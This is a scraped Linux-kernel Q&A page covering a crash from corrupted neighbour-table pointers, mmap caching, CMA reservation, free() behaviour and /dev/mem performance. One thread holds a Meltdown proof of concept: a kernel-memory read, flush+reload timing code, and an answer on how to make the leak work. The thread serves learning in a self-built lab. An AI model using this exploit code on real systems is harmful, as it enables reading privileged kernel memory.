Kernel address poising by clearing upper bits? - linux-kernel

Is there some mechanism in Linux which is poisoning addresses by zeroing upper 16 bits?
I am debugging a kernel crash on an Intel x86-64 machine. The instruction which is causing the crash tries to access an address of 0x880139f3da00:
crash> bt
R10: 0000000000000001 R11: 0000000000000001 R12: 0000880139f3da00
~~~~~~~~~~~~~~~~~~~~~
crash> p arp_tbl.nht->hash_buckets[255]
$66 = (struct neighbour *) 0x880139f3da00
crash> p *arp_tbl.nht->hash_buckets[255]
Cannot access memory at address 0x880139f3da00
The hash_buckets table is valid:
crash> p arp_tbl.nht->hash_buckets[253]
$70 = (struct neighbour *) 0xffff88007325ae00
$71 = {
next = 0x0,
tbl = 0xffffffff81abbf20 <arp_tbl>,
Setting upper word to 0xffff makes the address valid and returns a valid data structure:
crash> p *((struct neighbour *)0xffff880139f3da00)
$73 = {
next = 0xffff88006de69a00,
tbl = 0xffffffff81abbf20 <arp_tbl>,
... rest looks reasonable too ...
Structure is updated by RCU operations (e.g. very likely by these in neigh_flush_dev()). So, what could be the reason that the address becomes invalid in such a way?
I can exclude hardware defects (seen on two machines and with different addresses). Systems are running CentOS 7 with kernel 3.10.0-514.6.1.el7.centos.plus.x86_64 till 3.10.0-514.21.2.el7.centos.plus.x86_64.
Update
From another crash dump, I see an skb of an IPv6 packet with
crash> p *((struct sk_buff *)0xffff880070e25e00)
$57 = {
transport_header = 54,
network_header = 14,
mac_header = 0,
...
head = 0xffff880138e28000 "",
data = 0xffff880138e2800e "`",
...
}
This crashes when writing the first 0x8 bytes in
#define HH_DATA_MOD 16
static inline int neigh_hh_output(const struct hh_cache *hh, struct sk_buff *skb)
{
if (likely(hh_len <= HH_DATA_MOD)) {
memcpy(skb->data - HH_DATA_MOD, hh->hh_data, HH_DATA_MOD); <<<<<
This would explain why two bytes are overridden (16 - 14).

can you inspect the memory location this address was read from? typically such a "partial zero" read is a result of memset being run on the area. after this cpu triggered a crash there was possibly enough time for whoever else was modifying the area to finish zeroing and possibly even fill it with other data.
so far there is no reason to suspect rcu plays any role here
this is most definitely not "poisoning" done by the kernel (it would be quite weird to do it in this way). however, if the crash is reproducible (you say it occurred on at least 2 different machines?) then running a debug kernel may be of help, especially with slab debug enabled.

Related

MMAP buffer kernel writes are not seen by user space

i have a kernel driver which shares a buffer with the user space layer.
Everything seemed to work fine in my VM prototype (Ubuntu, Kernel 5.4) but when i moved my code to the target (same kernel but this is an embedded distro) I can clearly see that Kernel writes to the buffer (using memcpy, or memset) are not reflected in the User space side of the buffer.
Note that, i use direct buffer accesses on both sides. There is no concurrency issue, as the Kernel writes to, then the user space reads from.
I ended up believing this is a cache issue ... as the same code works perfectly in my VM.
The buffer size is 4 * PAGE_SIZE.
It is allocated as follows:
int _size = (SFP_BUFFER_SIZE + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);
input_buffer = (char*) kzalloc (_size, GFP_KERNEL); // aligned on page boundary
if (!input_buffer) {
dev_dbg(&dev, "open/ENOMEM (input_buffer)\n");
status = -ENOMEM;
goto err_all
When mmap'ing, i used the following code pattern:
vma->vm_ops = &fpgadrv_vm_ops;
vma->vm_page_prot = pgprot_noncached(vma->vm_page_prot);
pfn = virt_to_phys((void*)(input_buffer)) >> PAGE_SHIFT;
if (remap_pfn_range (vma, vma->vm_start, pfn, size, vma->vm_page_prot))
{
printk(KERN_DEBUG "remap page range failed\n");
return -EAGAIN;
}
User space code, and kernel code user memcpy to update the buffer. Note also that I cannot use write/read entry points, as they are already used for very specific operations.
The user code is calling mmap as follows:
buf = mmap(NULL, BUF_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, device_fd, 0);
if (buf == MAP_FAILED)
{
perror("USERDRV:cannot mmap");
return -1; // for testing, ignore the return code and continue
}
and upon IOCTL call, the kernel would fill up the mmap buffer as follows:
case IOCTL_RESET:
printk(KERN_DEBUG "FPGADRV: IOCTL RESET");
// reset the buffer (zero + put back the signature)
memset(input_buffer, 0xA5, SFP_BUFFER_SIZE);
memcpy((void*)(input_buffer), (void*)signature, 10);
break;
Is there something more i should do to make sure the pages are not cached (assuming this is the cause of my pb) ?
Thanks,
Jacques

Encouraging the CPU to perform out of order execution for a Meltdown test

I am attempting to exploit the meltdown security flaw on Ubuntu 16.04, with an unpatched kernel 4.8.0-36 on an Intel Core-i5 4300M CPU.
First, I am storing the secret data at an address in kernel space using a kernel module :
static __init int initialize_proc(void){
char* key_val = "abcd";
printk("Secret data address = %p\n", key_val);
printk("Value at %p = %s\n", key_val, key_val);
}
The printk statement gives me the address of the secret data.
Mar 30 07:00:49 VM kernel: [62055.121882] Secret data address = fa2ef024
Mar 30 07:00:49 VM kernel: [62055.121883] Value at fa2ef024 = abcd
I then attempt to access the data at this location and in the next instruction use it to cache an element of an array.
// Out of order execution
int meltdown(unsigned long kernel_addr){
char data = *(char*) kernel_addr; //Raises exception
array[data*4096+DELTA] += 10; // <----- Execute out of order
}
I am expecting the CPU to go ahead and cache the array element at index (data*4096 +DELTA) when performing out of order execution. After this, a bounds check is performed and SIGSEGV is thrown.
I handle the SIGSEGV and then time the access to the array elements to determine which one has been cached:
void attackChannel_x86(){
register uint64_t time1, time2;
volatile uint8_t *addr;
int min = 10000;
int temp, i, k;
for(i=0;i<256;i++){
time1 = __rdtscp(&temp); //timestamp before memory access
temp = array[i*4096 + DELTA];
time2 = __rdtscp(&temp) - time1; // change in timestamp after the access
if(time2<=min){
min = time2;
k=i;
}
}
printf("array[%d*4096+DELTA]\n", k);
}
Since the value in data is ‘a’, I am expecting the result to be array[97*4096 + DELTA] since ASCII value of ‘a’ is 97.
However, this is not working and I am getting random outputs.
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[241*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[78*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[146*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[115*4096+DELTA]
The possible reasons I could think of are:
The instruction caching the array element is not getting executed
out of order.
Out of order execution is occurring but the cache is being flushed.
I have misunderstood the mapping of memory in the kernel module and the address I'm using is incorrect
Since the system is vulnerable to meltdown, I am certain that rules out the 2nd possibility.
Hence, my question is: Why is out of order execution not working here? Are there any options/flags that “encourage” the CPU to execute out of order ?
Solutions I’ve already tried:
Using clock_gettime instead of rdtscp for timing memory access.
void attackChannel(){
int i, k, temp;
uint64_t diff;
volatile uint8_t *addr;
double min = 10000000;
struct timespec start, end;
for(i=0;i<256;i++){
addr = &array[i*4096 + DELTA];
clock_gettime(CLOCK_MONOTONIC, &start);
temp = *addr;
clock_gettime(CLOCK_MONOTONIC, &end);
diff = end.tv_nsec - start.tv_nsec;
if(diff<=min){
min = diff;
k=i;
}
}
if(min<600)
printf("Accessed element : array[%d*4096+DELTA]\n", k);
}
Keeping the arithmetic units “busy” by executing a loop (see meltdown_busy_loop)
void meltdown_busy_loop(unsigned long kernel_addr){
char kernel_data;
asm volatile(
".rept 1000;"
"add $0x01, %%eax;"
".endr;"
:
:
:"eax"
);
kernel_data = *(char*)kernel_addr;
array[kernel_data*4096 + DELTA] +=10;
}
Using procfs to force the data into the cache before performing a time attack (see meltdown)
int meltdown(unsigned long kernel_addr){
// Cache the data to improve success
int fd = open("/proc/my_secret_key", O_RDONLY);
if(fd<0){
perror("open");
return -1;
}
int ret = pread(fd, NULL, 0, 0); //Data is cached
char data = *(char*) kernel_addr; //Raises exception
array[data*4096+DELTA] += 10; // <----- Out of order
}
For anyone interested in setting it up, here is the link to the github repo
For the sake of completeness, I am appending the main function and error handling code below:
void flushChannel(){
int i;
for(i=0;i<256;i++) array[i*4096 + DELTA] = 1;
for(i=0;i<256;i++) _mm_clflush(&array[i*4096 + DELTA]);
}
void catch_segv(){
siglongjmp(jbuf, 1);
}
int main(){
unsigned long kernel_addr = 0xfa2ef024;
signal(SIGSEGV, catch_segv);
if(sigsetjmp(jbuf, 1)==0)
{
// meltdown(kernel_addr);
meltdown_busy_loop(kernel_addr);
}
else{
printf("Memory Access Violation\n");
}
attackChannel_x86();
}
I think the data needs to be in L1d for Meltdown to work, and attempting to read it only through a TLB / page-table entry that doesn't have privileges won't bring it into L1d.
http://blog.stuffedcow.net/2018/05/meltdown-microarchitecture/
When any kind of bad outcome occurs (page fault, load from a non-speculative memory type, page accessed bit = 0), none of the processors initiate an off-core L2 request to fetch the data.
Unless there's something I'm missing, I think data is only vulnerable to Meltdown when something that is allowed to read it has brought it into L1d. (Directly or via HW prefetch.) I don't think repeated Meltdown attacks can bring data from RAM into L1d.
Try adding a system call or something to your module that uses READ_ONCE() on your secret data (or manually write *(volatile int*)&data; or just make it volatile so you can easily touch it) to bring it into cache from a context that does have privileges for that PTE.
Also: add $0x01, %%eax is a poor choice for delaying retirement. It's only 1 clock cycle of delay per uop, so OoO exec only has ~64 cycles from when the first instruction after the ADDs can enter the scheduler (RS) and run, before it chews through the adds and the faulting loads reach retirement.
At least use imul (3c latency), or better use xorps %xmm0,%xmm0 / repeated sqrtpd %xmm0,%xmm0 (single uop, 16 cycle latency on your Haswell.) https://agner.org/optimize/.

How to work with reserved CMA memory?

I would like to allocate piece of physically contiguous reserved memory (in predefined physical addresses) for my device with DMA support.
As I see CMA has three options:
1. To reserve memory via kernel config file. 2. To reserve memory via kernel cmdline. 3. To reserve memory via device-tree memory node.
In the first case: size and number of areas could be reserved.
CONFIG_DMA_CMA=y
CONFIG_CMA_AREAS=7
CONFIG_CMA_SIZE_MBYTES=8
So I could use:
start_cma_virt = dma_alloc_coherent(dev->cmadev, (size_t)size_cma, &start_cma_dma, GFP_KERNEL);
in my driver to allocate contiguous memory. I could use it max 7 times and it will be possible allocate up to 8M. But unfortunately
dma_contiguous_reserve(min(arm_dma_limit, arm_lowmem_limit));
from arch/arm/mm/init.c:
void __init arm_memblock_init(struct meminfo *mi,const struct machine_desc *mdesc)
it is impossible to set predefined physical addresses for contiguous allocation.
Of Course I could use kernel cmdline:
mem=cma=cmadevlabel=8M#32M cma_map=mydevname=cmadevlabel
//struct device *dev = cmadev->dev; /*dev->name is mydevname*/
After that dma_alloc_coherent() should alloc memory in physical memory area from 32M + 8M (0x2000000 + 0x800000) up to 0x27FFFFF.
But unfortunately I have problem with this solution. Maybe my cmdline has error?
Next one try was device tree implementation.
cmadev_region: mycma {
/*no-map;*/ /*DMA coherent memory*/
/*reusable;*/
reg = <0x02000000 0x00100000>;
};
And phandle in some node:
memory-region = <&cmadev_region>;
As I saw in kernel usual it should be used like:
of_find_node_by_name(); //find needed node
of_parse_phandle(); //resolve a phandle property to a device_node pointer
of_get_address(); //get DT __be32 physical addresses
of_translate_address(); //DT represent local (bus, device) addresses so translate it to CPU physical addresses
request_mem_region(); //reserve IOMAP memory (cat /proc/iomem)
ioremap(); //alloc entry in page table for reserved memory and return kernel logical addresses.
But I want use DMA via (as I know only one external API function dma_alloc_coherent) dma_alloc_coherent() instead IO-MAP ioremap(). But how call
start_cma_virt = dma_alloc_coherent(dev->cmadev, (size_t)size_cma, &start_cma_dma, GFP_KERNEL);
associate memory from device-tree (reg = <0x02000000 0x00100000>;) to dev->cmadev ? In case with cmdline it is clear it has device name and addresses region.
Does reserved memory after call of_parse_phandle() automatically should be booked for your special driver (which parse DT). And next call dma_alloc_coherent will allocate dma area inside memory from cmadev_region: mycma?
To use dma_alloc_coherent() on reserved memory node, you need to declare that area as dma_coherent. You can do some thing like:
In dt:
cmadev_region: mycma {
compatible = "compatible-name"
no-map;
reg = <0x02000000 0x00100000>;
};
In your driver:
struct device *cma_dev;
static int rmem_dma_device_init(struct reserved_mem *rmem, struct device *dev)
{
int ret;
if (!mem) {
ret = dma_declare_coherent_memory(cma_dev, rmem->base, rmem->base,
rmem->size, DMA_MEMORY_EXCLUSIVE);
if (ret) {
pr_err("Error");
return ret;
}
}
return 0;
}
static void rmem_dma_device_release(struct reserved_mem *rmem,
struct device *dev)
{
if (dev)
dev->dma_mem = NULL;
}
static const struct reserved_mem_ops rmem_dma_ops = {
.device_init = rmem_dma_device_init,
.device_release = rmem_dma_device_release,
};
int __init cma_setup(struct reserved_mem *rmem)
{
rmem->ops = &rmem_dma_ops;
return 0;
}
RESERVEDMEM_OF_DECLARE(some-name, "compatible-name", cma_setup);
Now on this cma_dev you can perform dma_alloc_coherent and get memory.

Why doesn't free execute munmap?

I have the following code:
unsigned char *p = (unsigned char *)valloc(page_size);
if (!p) {
ret = -1;
goto out;
}
printf("valloc: allocated %d bytes, virtual address: %p\n", page_size, p);
memset(p, 0xFF, page_size);
memcpy(p, s, sizeof(s));
trace_mem(p, sizeof(s));
printf("Memory: %p - press any key\n", p);
getchar();
if (ioctl(fd, MY_IOC_PATCH) == -1) {
fprintf(stderr, "ioctl %s error(%d): %s\n ", "MY_IOC_PATCH", errno, strerror(errno));
ret = -1;
goto out;
}
if (p) {
printf("free: freed %d bytes, virtual address: %p\n", page_size, p);
free(p);
}
.........................
Then I use strace to observe system calls: strace ./my_program I get the following:
fstat64(1, {st_mode=S_IFREG|0644, st_size=1533, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7730000
brk(0) = 0x9d81000
brk(0x9da4000) = 0x9da4000
fstat64(0, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb772f000
read(0, "\n", 1024) = 1
ioctl(3, RTC_IRQP_SET, 0x1000) = 0
read(0, "\n", 1024) = 1
ioctl(3, RTC_EPOCH_READ, 0x9d82000) = 0
read(0, "\n", 1024) = 1
close(3) = 0
valloc: allocated 4096 bytes, virtual address: 0x9d82000
After the first IOCTL I don't see munlock. I suppose that free must use munlock to unmap memory, but it doesn't cause. What is the reason for that?
I think that Paramagnetic Croissant's comment, above, qualifies as "the Answer" to this one. It is ordinary practice for malloc() implementations to ask the operating-system for more memory when they need it, but then to never give it back. For any operating-system.
You see, there's really no need to "give it back." Pestering the kernel, asking him to carve out more VM-space and to update the memory-management data structures, is a comparatively expensive operation. But, it doesn't really "cost" much to keep the storage around. (The cost of "releasing them" doesn't gain you anything, especially if you turn right around and have to ask for them again!) So, you just do it once.
If you stop using those pages, they'll eventually get swapped-out, and the physical resource (page frames) will automagically get used for other purposes. "No harm, no foul." But then, if you then suddenly start using that storage again, there's no reason to "pester the kernel" a second (or third) time. The pages just get swapped-in again, and off you go.
malloc/valloc(page size variant of malloc) actually gets the memory addresses from virtual address space. These addresses have mapping to physical address by way of page tables that are specific to a particular process.Thence in my opinion all kernel has to do in case of [vm]alloc is:
1) Attach an anonymous segment to the process.
2) Associate a bunch of virtual address (heap area) entries with physical pages, of course on first use.
In case of "free" it just needs to disassociate the virtual memory entries with the physical pages. Note that since these are anonymous pages it aint need to care where the "data" needs to go, while mmaping a file it may need to stage it back to the disk.
The physical pages are tracked and managed by the memory manager independently and is governed by cache principles (hot, cold color etc). Thus there is no question of free trying to give back memory to the kernel. Since all it got was a virtual address. It will give back the virtual address to the glibc library which should maintain virtual address chunks for use by the specific process.

mmap /dev/mem, read performance is very slow

I have written a test program which is like this:
fd = open("/dev/mem", O_RDWR);
src = mmap(0x0, 0x1000000, PROT_READ, MAP_SHARED, fd, 0x80000000);/* 0x80000000 is physical start address of DDR on my A8-cortex platform */
dst = malloc(0x1000000);
start_time = get_time()
memcpy(dst, src, 0x1000000);
end_time = get_time();
print_speed();
On my ARM A8-cortex based board, it gives me about 400MB/s. Then I changed the above test program, src buffer is also alllocated by malloc, test again, now it gives me about 1400MB/s, about 3~4X faster.
I try to figure out the reason. First, I suspect that the src memory is uncached through mmap, so I check out the code in driver/cha/mem.c in kernel. In mmap_mem function, I use printk to print the page attribute of maped address, vma->vm_pgoff shows 0x10f, so it is not uncached.
Further more, I change the code and set it uncached type through vma->vm_pgoff = pgprot_nocached(vma->vm_pgoff) and test again, the result is about 30MB/s. So, we can defenitly confirm that /dev/mem maped memory is surely cached, but its read performance is very slow as compared to malloced memory.
Then how to explain this test result?

Resources